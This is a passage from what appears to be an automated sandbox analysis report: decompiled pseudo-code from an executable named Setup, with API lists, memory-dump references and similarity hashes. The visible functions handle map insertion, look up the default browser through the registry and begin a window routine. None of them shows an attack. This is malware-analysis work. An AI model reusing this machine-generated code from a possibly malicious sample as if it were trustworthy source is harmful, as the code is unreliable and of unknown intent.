                                                                                                                                                              				intOrPtr* _t103;
                                                                                                                                                              				intOrPtr* _t104;
                                                                                                                                                              				char* _t107;
                                                                                                                                                              				intOrPtr* _t113;
                                                                                                                                                              				intOrPtr* _t117;
                                                                                                                                                              				char* _t122;
                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                              				intOrPtr* _t134;
                                                                                                                                                              				intOrPtr* _t137;
                                                                                                                                                              				intOrPtr* _t149;
                                                                                                                                                              				char* _t156;
                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                              				intOrPtr* _t168;
                                                                                                                                                              				intOrPtr* _t171;
                                                                                                                                                              				intOrPtr* _t184;
                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                              				intOrPtr* _t188;
                                                                                                                                                              				signed int _t291;
                                                                                                                                                              				void* _t292;
                                                                                                                                                              				void* _t293;
                                                                                                                                                              				void* _t295;
                                                                                                                                                              				void* _t300;
                                                                                                                                                              				void* _t304;
                                                                                                                                                              				void* _t306;
                                                                                                                                                              				void* _t323;
                                                                                                                                                              				void* _t325;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x517298);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t293 = _t292 - 0x50;
                                                                                                                                                              				_t94 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t94 ^ _t291);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v96 = __ecx;
                                                                                                                                                              				if(E00434290(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
                                                                                                                                                              					E004134D0( &_v92, "map/set<T> too long");
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E00413D50( &_v92);
                                                                                                                                                              					E00456A4C( &_v64, 0x544b50);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00413C20( &_v92);
                                                                                                                                                              				}
                                                                                                                                                              				_t101 = E00433AC0( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0); // executed
                                                                                                                                                              				_v20 = _t101;
                                                                                                                                                              				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
                                                                                                                                                              				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
                                                                                                                                                              					__eflags = _a8 & 0x000000ff;
                                                                                                                                                              					if((_a8 & 0x000000ff) == 0) {
                                                                                                                                                              						_t103 = E00441910(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t103 = _v20;
                                                                                                                                                              						_t104 = E00433720(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t104;
                                                                                                                                                              						if(_a12 ==  *_t104) {
                                                                                                                                                              							 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t187 = E00415110(_a12);
                                                                                                                                                              						_t293 = _t293 + 4;
                                                                                                                                                              						 *_t187 = _v20;
                                                                                                                                                              						_t188 = E00433680(_v96);
                                                                                                                                                              						__eflags = _a12 -  *_t188;
                                                                                                                                                              						if(_a12 ==  *_t188) {
                                                                                                                                                              							 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433680(_v96))) = _v20;
                                                                                                                                                              					 *((intOrPtr*)(E00433720(_v96))) = _v20;
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = _v20;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t107 = E00436BA0( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              					_t295 = _t293 + 8;
                                                                                                                                                              					if( *_t107 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t113 = E0042AE30(_v24);
                                                                                                                                                              					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
                                                                                                                                                              					_t300 = _t295 + 0x10;
                                                                                                                                                              					if( *_t113 !=  *_t117) {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t122 = E00436BA0(_a12);
                                                                                                                                                              						_t304 = _t300 + 0x10;
                                                                                                                                                              						__eflags =  *_t122;
                                                                                                                                                              						if( *_t122 != 0) {
                                                                                                                                                              							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t306 = _t304 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t125;
                                                                                                                                                              							if(_v24 ==  *_t125) {
                                                                                                                                                              								_t137 = E0042AE30(_v24);
                                                                                                                                                              								_t306 = _t306 + 4;
                                                                                                                                                              								_v24 =  *_t137;
                                                                                                                                                              								E00433740(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t306 + 0x1c;
                                                                                                                                                              							E00427B10(_v96, __eflags,  *_t134);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00436BA0(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t304 + 0x20;
                                                                                                                                                              							_v24 =  *_t149;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
                                                                                                                                                              						_t156 = E00436BA0(_a12);
                                                                                                                                                              						_t323 = _t300 + 0x10;
                                                                                                                                                              						if( *_t156 != 0) {
                                                                                                                                                              							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t325 = _t323 + 8;
                                                                                                                                                              							__eflags = _v24 -  *_t159;
                                                                                                                                                              							if(_v24 ==  *_t159) {
                                                                                                                                                              								_t171 = E0042AE30(_v24);
                                                                                                                                                              								_t325 = _t325 + 4;
                                                                                                                                                              								_v24 =  *_t171;
                                                                                                                                                              								E00427B10(_v96, __eflags, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t168 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t325 + 0x1c;
                                                                                                                                                              							E00433740(_v96, __eflags,  *_t168);
                                                                                                                                                              						} else {
                                                                                                                                                              							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
                                                                                                                                                              							 *((char*)(E00436BA0(_a12))) = 1;
                                                                                                                                                              							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
                                                                                                                                                              							_t184 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
                                                                                                                                                              							_t293 = _t323 + 0x20;
                                                                                                                                                              							_v24 =  *_t184;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *((char*)(E00436BA0( *((intOrPtr*)(E0041D410(_v96)))))) = 1;
                                                                                                                                                              				E00445360(_a4, _v20);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}
                                                                                                                                                              0x00433584
                                                                                                                                                              0x00433596
                                                                                                                                                              0x0043359b
                                                                                                                                                              0x004335a0
                                                                                                                                                              0x004335a0
                                                                                                                                                              0x004333b5
                                                                                                                                                              0x004333d9
                                                                                                                                                              0x004333e0
                                                                                                                                                              0x004333e5
                                                                                                                                                              0x004333ed
                                                                                                                                                              0x0043346d
                                                                                                                                                              0x00433472
                                                                                                                                                              0x00433478
                                                                                                                                                              0x0043347a
                                                                                                                                                              0x00433480
                                                                                                                                                              0x00433485
                                                                                                                                                              0x0043348a
                                                                                                                                                              0x00433494
                                                                                                                                                              0x00433494
                                                                                                                                                              0x004334b0
                                                                                                                                                              0x004334d5
                                                                                                                                                              0x004334e7
                                                                                                                                                              0x004334ec
                                                                                                                                                              0x004334f5
                                                                                                                                                              0x004333ef
                                                                                                                                                              0x00433406
                                                                                                                                                              0x00433415
                                                                                                                                                              0x0043343a
                                                                                                                                                              0x0043344c
                                                                                                                                                              0x00433451
                                                                                                                                                              0x00433456
                                                                                                                                                              0x00433456
                                                                                                                                                              0x004334fa
                                                                                                                                                              0x00433644
                                                                                                                                                              0x0043365c
                                                                                                                                                              0x00433666
                                                                                                                                                              0x00433671
                                                                                                                                                              0x0043367d

APIs
• __CxxThrowException@8.LIBCMT ref: 00433275
  • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
• HandleT.LIBCPMTD ref: 004332C9
• HandleT.LIBCPMTD ref: 004332D6
• HandleT.LIBCPMTD ref: 004332E3
• HandleT.LIBCPMTD ref: 0043330B
• HandleT.LIBCPMTD ref: 0043331A
  • Part of subcall function 00433740: HandleT.LIBCPMTD ref: 004337D4
  • Part of subcall function 00433740: HandleT.LIBCPMTD ref: 004337E3
• HandleT.LIBCPMTD ref: 0043333A
• HandleT.LIBCPMTD ref: 00433349
• HandleT.LIBCPMTD ref: 0043364C
• _DebugHeapAllocator.LIBCPMTD ref: 00433666
Strings
Memory Dump Source
• Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Setup.jbxd
Similarity
• API ID: Handle$AllocatorDebugExceptionException@8HeapRaiseThrow
• String ID: map/set<T> too long
• API String ID: 3699313741-1285458680
• Opcode ID: 5c378c61003a94509d9a9d9cc51c2f99947a6c586fe5524ef43e96455eefa086
• Instruction ID: c96cb9d9ccfe4d81dabe12786e20b18d9636dbc6828f727d1f2b603ee65e5e8b
• Opcode Fuzzy Hash: 5c378c61003a94509d9a9d9cc51c2f99947a6c586fe5524ef43e96455eefa086
• Instruction Fuzzy Hash: 5BE1A6F5E00144AFDB04EFA1E89296FB375AF98308F14446DF8059B352DA39FA11CB66
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Figure: control-flow graph of the function at 004903A0; legend: Executed, Not Executed]
                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E004903A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed short* _a12) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				char _v60;
                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                              				char _v68;
                                                                                                                                                              				char _v72;
                                                                                                                                                              				char _v590;
                                                                                                                                                              				char _v592;
                                                                                                                                                              				char _v596;
                                                                                                                                                              				char _v1118;
                                                                                                                                                              				signed int _v1120;
                                                                                                                                                              				signed short _v1124;
                                                                                                                                                              				signed short* _v1128;
                                                                                                                                                              				char _v1132;
                                                                                                                                                              				char _v1133;
                                                                                                                                                              				char _v1168;
                                                                                                                                                              				char _v1169;
                                                                                                                                                              				char _v1204;
                                                                                                                                                              				char _v1205;
                                                                                                                                                              				char _v1240;
                                                                                                                                                              				char _v1241;
                                                                                                                                                              				char _v1276;
                                                                                                                                                              				char _v1277;
                                                                                                                                                              				char _v1278;
                                                                                                                                                              				intOrPtr _v1284;
                                                                                                                                                              				intOrPtr* _v1288;
                                                                                                                                                              				intOrPtr* _v1292;
                                                                                                                                                              				signed int _t134;
                                                                                                                                                              				signed int _t135;
                                                                                                                                                              				signed char _t147;
                                                                                                                                                              				void* _t154;
                                                                                                                                                              				signed short* _t160;
                                                                                                                                                              				void* _t163;
                                                                                                                                                              				signed char _t169;
                                                                                                                                                              				signed short* _t181;
                                                                                                                                                              				intOrPtr _t193;
                                                                                                                                                              				void* _t195;
                                                                                                                                                              				intOrPtr _t208;
                                                                                                                                                              				short _t260;
                                                                                                                                                              				signed int _t286;
                                                                                                                                                              				signed int _t309;
                                                                                                                                                              				void* _t310;
                                                                                                                                                              				void* _t311;
                                                                                                                                                              				void* _t313;
                                                                                                                                                              				void* _t315;
                                                                                                                                                              
                                                                                                                                                              				_t315 = __eflags;
                                                                                                                                                              				_t308 = __esi;
                                                                                                                                                              				_t307 = __edi;
                                                                                                                                                              				_t209 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5084ad);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t311 = _t310 - 0x4fc;
                                                                                                                                                              				_t134 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t135 = _t134 ^ _t309;
                                                                                                                                                              				_v28 = _t135;
                                                                                                                                                              				_push(_t135);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v1284 = __ecx;
                                                                                                                                                              				E00434E30( &_v24);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E00417A20(__ebx, _a8 + 4, __edi, __esi, 0, 0xffffffff);
                                                                                                                                                              				E00417A20(__ebx, _a4 + 4, __edi, __esi, 0, 0xffffffff);
                                                                                                                                                              				E004175C0(E00434050( &_v1133));
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				if((E00494F20(_t315) & 0x000000ff) == 0) {
                                                                                                                                                              					L10:
                                                                                                                                                              					if((E00416630( &_v56) & 0x000000ff) != 0 && E0041EEA0( &_v24, 0x80000000, L".html", 1) == 0) {
                                                                                                                                                              						_t260 =  *0x528ea0; // 0x0
                                                                                                                                                              						_v592 = _t260;
                                                                                                                                                              						E00451D90(_t307,  &_v590, 0, 0x206);
                                                                                                                                                              						_t311 = _t311 + 0xc;
                                                                                                                                                              						_v596 = 0x104;
                                                                                                                                                              						if(E0041EDE0( &_v24, 0x528ea4,  &_v592,  &_v596) == 0) {
                                                                                                                                                              							E00417910( &_v592, E00434050( &_v1205));
                                                                                                                                                              							_v8 = 4;
                                                                                                                                                              							E004181D0( &_v60,  &_v1204);
                                                                                                                                                              							_v8 = 1;
                                                                                                                                                              							E004176E0();
                                                                                                                                                              						}
                                                                                                                                                              						E0041EF10( &_v24);
                                                                                                                                                              					}
                                                                                                                                                              					if((E00416630( &_v56) & 0x000000ff) != 0) {
                                                                                                                                                              						L34:
                                                                                                                                                              						_t147 = E00416630(_a4 + 4);
                                                                                                                                                              						asm("sbb edx, edx");
                                                                                                                                                              						_v1278 =  ~(_t147 & 0x000000ff) + 1;
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E0041EF60( &_v24);
                                                                                                                                                              						 *[fs:0x0] = _v16;
                                                                                                                                                              						_t132 =  &_v28; // 0x490962
                                                                                                                                                              						__eflags =  *_t132 ^ _t309;
                                                                                                                                                              						return E0044F6C8(_v1278, _t209,  *_t132 ^ _t309,  ~(_t147 & 0x000000ff) + 1, _t307, _t308);
                                                                                                                                                              					} else {
                                                                                                                                                              						E004130D0( &_v56, L"\\shell\\open\\command");
                                                                                                                                                              						_t154 = E0041EEA0( &_v24, 0x80000000, E00416A30( &_v56), 1); // executed
                                                                                                                                                              						if(_t154 != 0) {
                                                                                                                                                              							goto L34;
                                                                                                                                                              						}
                                                                                                                                                              						_t286 =  *0x528ed0; // 0x0
                                                                                                                                                              						_v1120 = _t286;
                                                                                                                                                              						E00451D90(_t307,  &_v1118, 0, 0x206);
                                                                                                                                                              						_v1132 = 0x104;
                                                                                                                                                              						E0041EDE0( &_v24, 0x528ed4,  &_v1120,  &_v1132); // executed
                                                                                                                                                              						E0041EF10( &_v24); // executed
                                                                                                                                                              						_t160 = E004168F0( &_v1120, L"\"%1\"");
                                                                                                                                                              						_t313 = _t311 + 0x14;
                                                                                                                                                              						_v1128 = _t160;
                                                                                                                                                              						if(_v1128 == 0) {
                                                                                                                                                              							_t181 = E004168F0( &_v1120, L"%1");
                                                                                                                                                              							_t313 = _t313 + 8;
                                                                                                                                                              							_v1128 = _t181;
                                                                                                                                                              						}
                                                                                                                                                              						if(_v1128 != 0) {
                                                                                                                                                              							 *_v1128 = 0;
                                                                                                                                                              						}
                                                                                                                                                              						_v1124 = (0 | (_v1120 & 0x0000ffff) == 0x00000022) + (0 | (_v1120 & 0x0000ffff) == 0x00000022) + 0x20;
                                                                                                                                                              						_v1128 = E004296F0( &_v1118, _v1124 & 0x0000ffff);
                                                                                                                                                              						if(_v1128 == 0) {
                                                                                                                                                              							L28:
                                                                                                                                                              							__eflags = _a12;
                                                                                                                                                              							if(_a12 != 0) {
                                                                                                                                                              								__eflags =  *_a12 & 0x0000ffff;
                                                                                                                                                              								if(( *_a12 & 0x0000ffff) != 0) {
                                                                                                                                                              									_t169 = E00416630(_a8 + 4);
                                                                                                                                                              									__eflags = _t169 & 0x000000ff;
                                                                                                                                                              									if((_t169 & 0x000000ff) == 0) {
                                                                                                                                                              										__eflags = _a8 + 4;
                                                                                                                                                              										E004130D0(_a8 + 4, " ");
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _a8 + 4;
                                                                                                                                                              									E004130D0(_a8 + 4, _a12);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							_t163 = E00434050( &_v1277);
                                                                                                                                                              							(_v1120 & 0x0000ffff) - 0x22 = (_v1120 & 0x0000ffff) == 0x22;
                                                                                                                                                              							E00417910(_t309 + (0 | (_v1120 & 0x0000ffff) == 0x00000022) * 2 - 0x45c, _t163);
                                                                                                                                                              							_v8 = 6;
                                                                                                                                                              							E004181D0(_a4,  &_v1276);
                                                                                                                                                              							_v8 = 1;
                                                                                                                                                              							E004176E0();
                                                                                                                                                              							goto L34;
                                                                                                                                                              						} else {
                                                                                                                                                              							 *_v1128 = 0;
                                                                                                                                                              							_v1128 =  &(_v1128[1]);
                                                                                                                                                              							while(( *_v1128 & 0x0000ffff) == 0x20) {
                                                                                                                                                              								_v1128 =  &(_v1128[1]);
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *_v1128 & 0x0000ffff;
                                                                                                                                                              							if(( *_v1128 & 0x0000ffff) != 0) {
                                                                                                                                                              								E00417910(_v1128, E00434050( &_v1241)); // executed
                                                                                                                                                              								_v8 = 5;
                                                                                                                                                              								E004181D0(_a8,  &_v1240);
                                                                                                                                                              								_v8 = 1;
                                                                                                                                                              								E004176E0();
                                                                                                                                                              							}
                                                                                                                                                              							goto L28;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					E00414C90();
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					_t193 = E00443050( &_v68, 0x51bafc, 0, 0x17); // executed
                                                                                                                                                              					_v64 = _t193;
                                                                                                                                                              					if(_v64 >= 0) {
                                                                                                                                                              						_t195 = E0041D530( &_v68);
                                                                                                                                                              						_t318 = _t195;
                                                                                                                                                              						if(_t195 != 0) {
                                                                                                                                                              							_v72 = 0;
                                                                                                                                                              							if((E00494F40(_t318) & 0x000000ff) == 0) {
                                                                                                                                                              								_v1292 = E0041D530( &_v68);
                                                                                                                                                              								_v64 =  *((intOrPtr*)( *((intOrPtr*)( *_v1292 + 0xc))))(_v1292, L".html", 0, 1,  &_v72);
                                                                                                                                                              							} else {
                                                                                                                                                              								_v1288 = E0041D530( &_v68);
                                                                                                                                                              								_t208 =  *((intOrPtr*)( *((intOrPtr*)( *_v1288 + 0xc))))(_v1288, L"http", 0, 1,  &_v72); // executed
                                                                                                                                                              								_v64 = _t208;
                                                                                                                                                              							}
                                                                                                                                                              							if(_v64 >= 0 && _v72 != 0) {
                                                                                                                                                              								E00417910(_v72, E00434050( &_v1169));
                                                                                                                                                              								_v8 = 3;
                                                                                                                                                              								E004181D0( &_v60,  &_v1168);
                                                                                                                                                              								_v8 = 2;
                                                                                                                                                              								E004176E0();
                                                                                                                                                              								__imp__CoTaskMemFree(_v72);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					E0040D320();
                                                                                                                                                              					goto L10;
                                                                                                                                                              				}
                                                                                                                                                              			}
                                                                                                                                                              0x00490699
                                                                                                                                                              0x0049069e
                                                                                                                                                              0x004906a1
                                                                                                                                                              0x004906ae
                                                                                                                                                              0x004906bc
                                                                                                                                                              0x004906c1
                                                                                                                                                              0x004906c4
                                                                                                                                                              0x004906c4
                                                                                                                                                              0x004906d1
                                                                                                                                                              0x004906db
                                                                                                                                                              0x004906db
                                                                                                                                                              0x004906f1
                                                                                                                                                              0x0049070f
                                                                                                                                                              0x0049071c
                                                                                                                                                              0x004907aa
                                                                                                                                                              0x004907aa
                                                                                                                                                              0x004907ae
                                                                                                                                                              0x004907b6
                                                                                                                                                              0x004907b8
                                                                                                                                                              0x004907c0
                                                                                                                                                              0x004907c8
                                                                                                                                                              0x004907ca
                                                                                                                                                              0x004907d4
                                                                                                                                                              0x004907d7
                                                                                                                                                              0x004907d7
                                                                                                                                                              0x004907e3
                                                                                                                                                              0x004907e6
                                                                                                                                                              0x004907e6
                                                                                                                                                              0x004907b8
                                                                                                                                                              0x004907f1
                                                                                                                                                              0x00490803
                                                                                                                                                              0x00490814
                                                                                                                                                              0x00490819
                                                                                                                                                              0x00490827
                                                                                                                                                              0x0049082c
                                                                                                                                                              0x00490836
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00490722
                                                                                                                                                              0x0049072a
                                                                                                                                                              0x00490736
                                                                                                                                                              0x0049074d
                                                                                                                                                              0x00490747
                                                                                                                                                              0x00490747
                                                                                                                                                              0x00490766
                                                                                                                                                              0x00490768
                                                                                                                                                              0x00490783
                                                                                                                                                              0x00490788
                                                                                                                                                              0x00490796
                                                                                                                                                              0x0049079b
                                                                                                                                                              0x004907a5
                                                                                                                                                              0x004907a5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00490768
                                                                                                                                                              0x0049071c
                                                                                                                                                              0x00490426
                                                                                                                                                              0x00490429
                                                                                                                                                              0x0049042e
                                                                                                                                                              0x0049043e
                                                                                                                                                              0x00490443
                                                                                                                                                              0x0049044a
                                                                                                                                                              0x00490453
                                                                                                                                                              0x00490458
                                                                                                                                                              0x0049045a
                                                                                                                                                              0x00490460
                                                                                                                                                              0x00490471
                                                                                                                                                              0x004904af
                                                                                                                                                              0x004904d6
                                                                                                                                                              0x00490473
                                                                                                                                                              0x0049047b
                                                                                                                                                              0x004904a0
                                                                                                                                                              0x004904a2
                                                                                                                                                              0x004904a2
                                                                                                                                                              0x004904dd
                                                                                                                                                              0x004904fb
                                                                                                                                                              0x00490500
                                                                                                                                                              0x0049050e
                                                                                                                                                              0x00490513
                                                                                                                                                              0x0049051d
                                                                                                                                                              0x00490526
                                                                                                                                                              0x00490526
                                                                                                                                                              0x004904dd
                                                                                                                                                              0x0049045a
                                                                                                                                                              0x0049052c
                                                                                                                                                              0x00490533
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00490533

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 004903D4
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000000), ref: 00490526
                                                                                                                                                              • _memset.LIBCMT ref: 00490583
                                                                                                                                                              • _memset.LIBCMT ref: 00490658
                                                                                                                                                                • Part of subcall function 00443050: CoCreateInstance.OLE32(000000FF,00000000,000000FF,0053D3B4,DDD124F9,?,?,00490443,0051BAFC,00000000,00000017,00000000,00000000,000000FF,00000000,000000FF), ref: 0044306C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memset$CreateFreeInstanceIterator_baseIterator_base::_Taskstd::_
                                                                                                                                                              • String ID: "%1"$.html$.html$\shell\open\command$bI$http
                                                                                                                                                              • API String ID: 2934898464-3068258827
                                                                                                                                                              • Opcode ID: 0a6d62c7a929561fdff6fd2344a96f4eeb62c02c6712fcff80c20a96d819e14c
                                                                                                                                                              • Instruction ID: a00b38a2294e0f63c61b35cacd2b43a42522c649960b94876aacb899d072ca9d
                                                                                                                                                              • Opcode Fuzzy Hash: 0a6d62c7a929561fdff6fd2344a96f4eeb62c02c6712fcff80c20a96d819e14c
                                                                                                                                                              • Instruction Fuzzy Hash: 8AD1A3B0900218AEDF14DF55CD91BEEB774AF54308F0040AEE606671D2EB786E89CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00491FB0(void* __ebx, intOrPtr __ecx, struct HWND__* __edx, void* __edi, void* __esi, struct HWND__** _a4) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				struct HWND__* _v20;
                                                                                                                                                              				signed int _v21;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				void* _v60;
                                                                                                                                                              				char _v72;
                                                                                                                                                              				short _v592;
                                                                                                                                                              				char _v596;
                                                                                                                                                              				void* _v632;
                                                                                                                                                              				struct HWND__* _v636;
                                                                                                                                                              				char _v668;
                                                                                                                                                              				char _v669;
                                                                                                                                                              				char _v680;
                                                                                                                                                              				void* _v716;
                                                                                                                                                              				char _v720;
                                                                                                                                                              				char _v752;
                                                                                                                                                              				char _v753;
                                                                                                                                                              				char _v764;
                                                                                                                                                              				void* _v800;
                                                                                                                                                              				char _v804;
                                                                                                                                                              				char _v836;
                                                                                                                                                              				char _v837;
                                                                                                                                                              				char _v848;
                                                                                                                                                              				void* _v884;
                                                                                                                                                              				int _v888;
                                                                                                                                                              				char _v920;
                                                                                                                                                              				char _v921;
                                                                                                                                                              				char _v932;
                                                                                                                                                              				void* _v968;
                                                                                                                                                              				int _v972;
                                                                                                                                                              				char _v1004;
                                                                                                                                                              				char _v1005;
                                                                                                                                                              				char _v1016;
                                                                                                                                                              				char _v1017;
                                                                                                                                                              				char _v1052;
                                                                                                                                                              				char _v1053;
                                                                                                                                                              				char _v1060;
                                                                                                                                                              				char _v1064;
                                                                                                                                                              				struct HWND__* _v1068;
                                                                                                                                                              				intOrPtr _v1072;
                                                                                                                                                              				intOrPtr _v1076;
                                                                                                                                                              				intOrPtr _v1080;
                                                                                                                                                              				intOrPtr _v1084;
                                                                                                                                                              				intOrPtr _v1088;
                                                                                                                                                              				intOrPtr _v1092;
                                                                                                                                                              				intOrPtr _v1096;
                                                                                                                                                              				intOrPtr _v1100;
                                                                                                                                                              				intOrPtr _v1104;
                                                                                                                                                              				intOrPtr _v1108;
                                                                                                                                                              				intOrPtr _v1112;
                                                                                                                                                              				signed int _t141;
                                                                                                                                                              				signed int _t142;
                                                                                                                                                              				struct HWND__* _t189;
                                                                                                                                                              				signed int _t191;
                                                                                                                                                              				struct HWND__* _t192;
                                                                                                                                                              				signed int _t195;
